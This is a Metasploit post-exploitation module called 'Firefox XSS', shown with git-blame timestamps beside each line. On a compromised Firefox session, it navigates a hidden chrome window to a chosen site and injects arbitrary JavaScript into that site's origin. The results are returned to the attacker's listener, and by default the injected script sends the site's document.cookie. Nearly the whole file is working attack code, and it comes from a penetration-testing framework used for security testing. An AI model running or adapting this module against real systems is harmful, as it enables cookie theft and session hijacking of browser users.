2014-01-04 14:46:41 +00:00
|
|
|
##
|
|
|
|
# This module requires Metasploit: http//metasploit.com/download
|
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
2014-01-06 17:15:10 +00:00
|
|
|
require 'json'
|
2014-01-04 14:46:41 +00:00
|
|
|
|
|
|
|
class Metasploit3 < Msf::Post
|
2014-01-07 22:17:34 +00:00
|
|
|
|
|
|
|
include Msf::Payload::Firefox
|
|
|
|
|
2014-01-04 14:46:41 +00:00
|
|
|
def initialize(info={})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'Firefox XSS',
|
|
|
|
'Description' => %q{
|
|
|
|
This module runs the provided SCRIPT as javascript in the
|
|
|
|
origin of the provided URL. It works by navigating a hidden
|
|
|
|
ChromeWindow to the URL, then injecting the SCRIPT with Function.
|
2014-01-05 01:06:01 +00:00
|
|
|
The callback "send(result)" is used to send data back to the listener.
|
2014-01-04 14:46:41 +00:00
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Author' => [ 'joev' ],
|
|
|
|
'Platform' => [ 'firefox' ]
|
|
|
|
))
|
|
|
|
|
|
|
|
register_options([
|
2014-01-05 01:06:01 +00:00
|
|
|
OptString.new('SCRIPT', [true, "The javascript command to run", 'send(document.cookie)']),
|
2014-01-04 14:46:41 +00:00
|
|
|
OptPath.new('SCRIPTFILE', [false, "The javascript file to run"]),
|
|
|
|
OptString.new('URL', [
|
|
|
|
true, "URL to inject into", 'http://metasploit.com'
|
|
|
|
]),
|
|
|
|
OptInt.new('TIMEOUT', [true, "Maximum time (seconds) to wait for a response", 90])
|
|
|
|
], self.class)
|
|
|
|
end
|
|
|
|
|
|
|
|
def run
|
2014-01-05 01:00:36 +00:00
|
|
|
session.shell_write("[JAVASCRIPT]#{js_payload}[/JAVASCRIPT]")
|
|
|
|
results = session.shell_read_until_token("[!JAVASCRIPT]", 0, datastore['TIMEOUT'])
|
2014-01-04 14:46:41 +00:00
|
|
|
|
|
|
|
if results.present?
|
|
|
|
print_good results
|
|
|
|
else
|
|
|
|
print_error "No response received"
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
def js_payload
|
|
|
|
js = datastore['SCRIPT'].strip
|
|
|
|
%Q|
|
|
|
|
|
2014-01-05 01:00:36 +00:00
|
|
|
(function(send){
|
2014-01-07 22:17:34 +00:00
|
|
|
#{set_timeout_source}
|
|
|
|
|
2014-01-04 14:46:41 +00:00
|
|
|
var hiddenWindow = Components.classes["@mozilla.org/appshell/appShellService;1"]
|
|
|
|
.getService(Components.interfaces.nsIAppShellService)
|
|
|
|
.hiddenDOMWindow;
|
|
|
|
|
|
|
|
hiddenWindow.location = 'about:blank';
|
|
|
|
var src = (#{JSON.unparse({ :src => js })}).src;
|
|
|
|
var key = "#{Rex::Text.rand_text_alphanumeric(8+rand(12))}";
|
2014-01-05 01:00:36 +00:00
|
|
|
|
2014-01-04 14:46:41 +00:00
|
|
|
hiddenWindow[key] = true;
|
|
|
|
hiddenWindow.location = "#{datastore['URL']}";
|
|
|
|
|
|
|
|
var evt = function() {
|
|
|
|
if (hiddenWindow[key]) {
|
2014-01-07 22:17:34 +00:00
|
|
|
setTimeout(evt, 200);
|
2014-01-04 14:46:41 +00:00
|
|
|
} else {
|
2014-01-07 22:17:34 +00:00
|
|
|
setTimeout(function(){
|
2014-01-05 01:00:36 +00:00
|
|
|
try {
|
2014-01-12 16:46:23 +00:00
|
|
|
send(hiddenWindow.wrappedJSObject.Function('send', src)(send));
|
2014-01-05 01:00:36 +00:00
|
|
|
} catch (e) {
|
|
|
|
send("Error: "+e.message);
|
|
|
|
}
|
2014-01-04 14:46:41 +00:00
|
|
|
}, 500);
|
|
|
|
}
|
|
|
|
};
|
|
|
|
|
2014-01-07 22:17:34 +00:00
|
|
|
setTimeout(evt, 200);
|
2014-01-05 01:00:36 +00:00
|
|
|
})(send);
|
2014-01-04 14:46:41 +00:00
|
|
|
|
|
|
|
|.strip
|
|
|
|
end
|
|
|
|
end
|